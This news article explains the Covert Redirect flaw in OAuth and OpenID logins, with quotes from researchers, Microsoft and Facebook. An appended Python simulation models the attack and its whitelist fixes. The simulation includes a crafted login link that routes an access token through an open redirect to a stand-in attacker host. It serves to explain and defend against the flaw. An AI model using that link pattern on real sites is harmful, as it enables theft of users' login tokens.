A vulnerability in how many websites implement OAuth 2.0 and OpenID logins – dubbed “Covert Redirect,” a play on Open Redirect – could enable attackers to, at the very least, steal credentials and access tokens from users of some of the most visited websites, including Facebook and Google.
The Covert Redirect vulnerability, discovered and blogged about by Wang Jing, a PhD student in mathematics at Nanyang Technological University, comes right on the heels of the disclosure of the now infamous Heartbleed bug.
The general consensus, so far, is that Covert Redirect is not as serious as Heartbleed, but still a threat. Understanding what makes it dangerous requires a basic understanding of Open Redirect and how it can be exploited.
“If you have any website that shows in its URL the address a user is going to be redirected to, it opens the door for an attacker to place their own URL there and mislead the user into thinking they are at a trusted site,” Ori Eisen, chief innovation officer with security and fraud detection firm 41st Parameter, said.
Covert Redirect plays off the Open Redirect concept, Jeremy Gillula, a staff technologist with the Electronic Frontier Foundation, said.
“A user clicks a link, which takes them to a website of a third-party [that is] vulnerable to Open Redirect, which uses OAuth or OpenID to log users in,” Gillula said.
“The user's attempt to log in brings them to [Facebook, for example,] where their OpenID account or OAuth credentials are actually stored.”
After the user logs into the legitimate Facebook page, they are redirected back to the third-party website, Gillula said.
As part of the redirect, Facebook would send along a “token”, essentially a secret string that the third party will present to Facebook when accessing the account for regular operations, such as posting a message to the user's wall.
“When the user comes back to the third-party website, they hit the Open Redirect vulnerability, and then they get tossed, along with their token, to the malicious website, which grabs the token and does all sorts of malicious stuff with it in their account,” Gillula said.
Both Gillula and Eisen said that, in most cases, attackers using Covert Redirect are only likely to steal credentials; however, that access is all an attacker needs to create some havoc, particularly when these are big-name accounts, such as Facebook, Google, Microsoft and LinkedIn.
Although Wang said in the blog post that Covert Redirect would not be possible if third-party applications adhered to a whitelist of permitted redirect URLs, he said challenges lie in the practicality of implementing such a scheme, particularly in determining who is responsible for fixing the vulnerability.
One fix suggested by Gillula involved using a small script to try to visit the URL to which users are being redirected before sending them there.
“If that URL then attempts to immediately redirect the script again, then the script could prevent the first redirect in the first place,” Gillula said.
“While this has the added benefit of guaranteeing no Covert Redirects, it would probably slow down the user's experience a tiny bit – and additional measures would probably be necessary to make sure attackers can't use this script to perform a denial-of-service attack.”
A Microsoft spokesperson said the company is looking into vulnerabilities in OpenID and will take necessary actions to protect customers.
To avoid this problem on Facebook, a spokesperson referred developers to documentation that advises them to specify a whitelist of OAuth redirect URLs for their app.
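The chain Gillula describes, and the whitelist fix that Wang and Facebook's documentation point to, can be modelled in a few dozen lines. What follows is an added illustration written for this article, not code from Wang's post or from any provider; the hosts (idp.example, thirdparty.example, attacker.example), endpoint paths, client ID and token value are invented. It walks an implicit-grant login whose token travels in the URL fragment, passes the response through an unvalidated `next=` redirect on the third-party site, and shows the fragment, token included, arriving on the attacker's page. Switching the provider to exact-match redirect URI validation, or the third-party site to a same-site-only redirect, breaks the chain.

```python
"""Model of the Covert Redirect chain and of the whitelist fix.

Added illustration for this article, not code from Wang's post or from any
identity provider. Hosts, paths, client IDs and the token value are invented.
"""
from urllib.parse import urlsplit, urlunsplit, parse_qs, urlencode

# Identity provider side ("Facebook" in the article). The registered client
# has exactly one whitelisted redirect URI. Constructed sample data.
REGISTERED = {"client-123": {"https://thirdparty.example/oauth/callback"}}


def redirect_uri_allowed(client_id, redirect_uri, strict):
    """Decide whether the provider will redirect to redirect_uri for this client.

    strict=True  : exact match against the whitelist (the fix the article points to).
    strict=False : the lax check Covert Redirect abuses: any URL on a registered
                   host is accepted, so an open redirect on that host qualifies.
    """
    registered = REGISTERED.get(client_id, set())
    if strict:
        return redirect_uri in registered
    host = urlsplit(redirect_uri).netloc
    return any(urlsplit(r).netloc == host for r in registered)


def authorize(client_id, redirect_uri, strict):
    """Implicit-grant style response: 302 to redirect_uri with the token in the fragment.
    Returns the Location value, or None if the provider refuses (error page, no redirect)."""
    if not redirect_uri_allowed(client_id, redirect_uri, strict):
        return None
    token = "tok_constructed_secret"  # constructed; a real provider mints this
    scheme, netloc, path, query, _ = urlsplit(redirect_uri)
    return urlunsplit((scheme, netloc, path, query, urlencode({"access_token": token})))


# Third-party site (the OAuth client) side.
def client_open_redirect(url):
    """Vulnerable /redirect?next=... : sends the browser wherever 'next' points."""
    return parse_qs(urlsplit(url).query).get("next", [None])[0]


def client_safe_redirect(url):
    """Hardened /redirect: honours only a same-site path, otherwise lands on the home page."""
    nxt = parse_qs(urlsplit(url).query).get("next", ["/"])[0]
    parts = urlsplit(nxt)
    if (parts.scheme or parts.netloc or not nxt.startswith("/")
            or nxt.startswith("//") or "\\" in nxt):  # browsers treat '\' as '/'
        return "https://thirdparty.example/"
    return "https://thirdparty.example" + nxt


def browser_follow(start_url, handlers, max_hops=5):
    """Follow redirects like a browser: when a Location carries no fragment, the
    fragment of the previous URL is kept. That behaviour is what leaks the token."""
    url, fragment = start_url, ""
    for _ in range(max_hops):
        parts = urlsplit(url)
        if parts.fragment:
            fragment = parts.fragment
        handler = handlers.get((parts.netloc, parts.path))
        if handler is None:  # no redirect here: this is the page the browser lands on
            return urlunsplit((parts.scheme, parts.netloc, parts.path, parts.query, fragment))
        url = handler(url)
        if url is None:  # provider refused the redirect_uri
            return None
    raise RuntimeError("too many redirects")


def covert_redirect(strict_provider, client_redirect):
    """Run the attacker's link through the chain; return the URL the victim ends on."""
    redirect_uri = "https://thirdparty.example/redirect?" + urlencode(
        {"next": "https://attacker.example/steal"})
    start = "https://idp.example/authorize?" + urlencode(
        {"client_id": "client-123", "redirect_uri": redirect_uri})

    def provider(u):
        q = parse_qs(urlsplit(u).query)
        return authorize(q["client_id"][0], q["redirect_uri"][0], strict_provider)

    handlers = {("idp.example", "/authorize"): provider,
                ("thirdparty.example", "/redirect"): client_redirect}
    return browser_follow(start, handlers)


if __name__ == "__main__":
    print("lax provider + open redirect :", covert_redirect(False, client_open_redirect))
    print("lax provider + safe redirect :", covert_redirect(False, client_safe_redirect))
    print("strict provider              :", covert_redirect(True, client_open_redirect))
```

Two details carry the whole attack. First, the provider's lax check accepts any URL on the registered host, so a redirect URI pointing at the third party's own open redirect passes. Second, browsers keep the `#access_token=...` fragment across a 3xx response whose Location has no fragment of its own, so the open redirect hands the token to the attacker's page without the third-party site ever seeing it. An exact-match whitelist on the provider stops the chain at the first hop; a same-site-only redirect on the client stops it at the second.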